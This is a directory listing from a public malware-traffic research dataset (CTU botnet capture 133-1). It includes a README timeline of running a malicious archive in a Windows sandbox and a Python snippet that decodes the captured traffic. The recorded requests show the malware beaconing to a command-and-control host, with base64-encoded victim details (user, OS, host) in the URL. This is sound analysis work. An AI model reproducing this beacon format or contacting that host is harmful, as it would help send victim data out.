Index of /publicDatasets/CTU-Malware-Capture-Botnet-133-1

Name                                            Last modified     Size

Parent Directory                                                  -
2015-09-09_capture-win4.biargus                 2015-10-15 16:33  1.4M
2015-09-09_capture-win4.binetflow               2015-10-15 16:33  844K
2015-09-09_capture-win4.capinfos                2015-09-11 11:36  761
2015-09-09_capture-win4.dnstop                  2015-09-11 11:36  2.2K
2015-09-09_capture-win4.html                    2015-09-11 11:38  355K
2015-09-09_capture-win4.json                    2015-09-11 11:38  3.8K
2015-09-09_capture-win4.passivedns              2015-09-11 11:36  1.9K
2015-09-09_capture-win4.pcap                    2015-09-10 14:24  2.0M
2015-09-09_capture-win4.rrd                     2015-09-10 14:26  8.0M
2015-09-09_capture-win4.tcpdstat                2016-12-05 22:29  1.7K
2015-09-09_capture-win4.weblogng                2016-06-15 17:43  48K
README.html                                     2017-01-14 17:09  2.4K
README.md                                       2015-09-11 22:08  1.9K
TheTruthAboutYourSexualPeak,DontWorry.exe.zip   2015-12-16 10:26  90K
Tips.rar                                        2015-09-08 09:46  84K
bro/                                            2017-08-31 09:45  -
fast-flux-dga-first-analysis.txt                2017-01-14 17:09  4.2K

Timeline

Tue Sep 8 09:45:37 CEST 2015

Start win4

Tue Sep 8 09:50:54 CEST 2015

Executed Tips.rar: opened the container and double-clicked the exe file.

There was also a fake error, and then it started working like the Details.zip file of the previous capture.

URLs Requested

GET /index.php HTTP/1.1
Host: facetoo.co.vu

GET /IOS.php?Pn=V0lONCB8IEFkbWluaXN0cmF0b3I&fr=&GR=RmFjZUJvb2soSU9TKTxicj4gMjAxNS0wOC0yNA&com=IDxicj4gIDxicj4g&ID=12418116422684110102619421320747612712095&o=TWljcm9zb2Z0IFdpbmRvd3MgNyBVbHRpbWF0ZSA&ho=ZmFjZXRvby5jby52dQ==&av=&v=501P HTTP/1.1
User-Agent: 12418116422684110102619421320747612712095
Host: facetoo.co.vu

Base64 decode of some parts of the URL
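An added example, not part of the original README: a Python sketch that splits the /IOS.php request above into its query parameters and decodes the ones that are base64-encoded text. The function names are hypothetical; the request target is copied from this page.

```python
import base64
import binascii
from urllib.parse import parse_qsl, urlsplit

# Request target copied from the "URLs Requested" section of this page.
REQUEST_TARGET = (
    "/IOS.php?Pn=V0lONCB8IEFkbWluaXN0cmF0b3I&fr="
    "&GR=RmFjZUJvb2soSU9TKTxicj4gMjAxNS0wOC0yNA&com=IDxicj4gIDxicj4g"
    "&ID=12418116422684110102619421320747612712095"
    "&o=TWljcm9zb2Z0IFdpbmRvd3MgNyBVbHRpbWF0ZSA"
    "&ho=ZmFjZXRvby5jby52dQ==&av=&v=501P"
)


def decode_field(value):
    """Return the decoded text if value is base64 of printable UTF-8, else None."""
    if not value:
        return None
    # Several fields in this request lack their trailing '=', so restore padding.
    padded = value + "=" * (-len(value) % 4)
    try:
        text = base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        # Not base64 text: the numeric ID cannot be padded to a valid length,
        # and "501P" decodes to bytes that are not UTF-8.
        return None
    return text if text.isprintable() else None


def decode_beacon(target):
    """Map each query parameter to its decoded text, or None if it is not base64 text."""
    query = urlsplit(target).query
    return {name: decode_field(value)
            for name, value in parse_qsl(query, keep_blank_values=True)}


if __name__ == "__main__":
    for name, text in decode_beacon(REQUEST_TARGET).items():
        print(f"{name:>4} = {text!r}")
```

Parameters reported as None (fr, ID, av, v) are empty or not base64 text and should be read as they appear in the request.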

Thu Sep 10 14:24:47 CEST 2015

poweroff